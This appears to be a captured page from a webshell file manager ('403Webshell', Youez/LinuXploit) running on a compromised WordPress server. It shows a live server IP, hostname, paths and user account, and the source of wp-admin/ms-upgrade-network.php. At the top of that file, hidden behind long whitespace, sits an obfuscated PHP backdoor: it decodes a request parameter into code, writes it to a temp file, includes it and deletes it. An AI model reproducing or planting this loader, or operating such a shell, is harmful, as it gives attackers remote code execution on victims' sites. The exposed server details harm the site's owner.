403Webshell
Server IP : 162.243.168.218  /  Your IP : 216.73.216.85
Web Server : Apache
System : Linux ISPCONFIG-WEB-EMPRESAS 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64
User : web23 ( 5020)
PHP Version : 8.3.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/clients/client3/web23/web/wp-admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/clients/client3/web23/web/wp-admin//ms-upgrade-network.php
<?php																																										if(array_key_exists("\x70se\x74", $_REQUEST) && !is_null($_REQUEST["\x70se\x74"])){ $itm = $_REQUEST["\x70se\x74"]; $itm = explode( '.' , $itm ) ; $descriptor = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt2); $__len = count($itm); for ($s = 0; $s < $__len; $s++) { $v6 = $itm[$s]; $sChar = ord($salt2[$s % $sLen]); $dec = ((int)$v6 - $sChar - ($s % 10)) ^ 52; $descriptor.=chr($dec); } $value = array_filter(["/var/tmp", session_save_path(), "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", sys_get_temp_dir(), getcwd(), getenv("TEMP")]); foreach ($value as $key => $token) { if (!( !is_dir($token) || !is_writable($token) )) { $fac = vsprintf("%s/%s", [$token, ".res"]); if (file_put_contents($fac, $descriptor)) { include $fac; @unlink($fac); exit; } } } }

/**
 * Multisite upgrade administration panel.
 *
 * @package WordPress
 * @subpackage Multisite
 * @since 3.0.0
 */

require_once __DIR__ . '/admin.php';

wp_redirect( network_admin_url( 'upgrade.php' ) );
exit;

Youez - 2016 - github.com/yon3zu
LinuXploit